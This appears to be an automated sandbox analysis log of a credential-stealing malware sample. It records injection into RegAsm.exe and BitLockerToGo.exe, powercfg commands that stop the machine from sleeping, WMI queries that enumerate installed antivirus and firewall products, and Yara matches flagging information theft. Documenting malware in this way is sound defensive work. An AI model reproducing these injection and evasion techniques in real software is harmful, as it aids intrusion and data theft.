                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 103F008Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DFA008
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 31BB008
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeProcess created: unknown unknown
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0053EE6E cpuid 2_2_0053EE6E
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,2_2_005610C7
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_005612CC
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_00561373
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_005613BE
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_00561459
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_005614E4
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_0055B578
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoEx,FormatMessageA,2_2_005406BF
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_00561737
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00561860
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_00561966
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_0055BA47
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00561A3C
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: GetLocaleInfoA,8_2_0040520C
                              Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exeCode function: GetLocaleInfoA,8_2_00405258
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeCode function: GetLocaleInfoW,9_1_00434317
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeQueries volume information: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exeQueries volume information: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeQueries volume information: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exeQueries volume information: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exeQueries volume information: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exeQueries volume information: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe VolumeInformation
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeQueries volume information: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe VolumeInformation
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeQueries volume information: C:\Windows VolumeInformation
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeQueries volume information: C:\Windows\AppReadiness VolumeInformation
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                              Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeQueries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
                              Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042C650 GetSystemTimeAsFileTime,2_2_0042C650
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00442070 GetComputerNameA,__aulldiv,GlobalAlloc,LookupAccountNameA,GetLastError,ConvertSidToStringSidA,GetLastError,2_2_00442070
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042DCD0 RtlGetVersion,GetVersionExA,2_2_0042DCD0
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                              Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                              Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1749729398.0000000001091000.00000004.00000020.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1752375741.0000000000851000.00000004.00000020.00020000.00000000.sdmp, RK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1702372712.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, kCxbYlQ2A6NZXLbKZjtnUx3R.exe, 0000000E.00000002.1656855821.0000000001561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                              Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1749729398.0000000001091000.00000004.00000020.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1752375741.0000000000851000.00000004.00000020.00020000.00000000.sdmp, RK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1702372712.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, kCxbYlQ2A6NZXLbKZjtnUx3R.exe, 0000000E.00000002.1656855821.0000000001561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2155274987.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 00000011.00000002.2757239787.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1618173689.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR
                              Source: Yara matchFile source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000017.00000002.1704277964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.1829361336.0000000004155000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 29.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: RK8ajtyf9pvKlaXEo3EjTbnu.exe PID: 7964, type: MEMORYSTR
                              Source: Yara matchFile source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000002.2812741708.0000000002D0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000002.2813195969.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 31.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 31.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2425101444.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
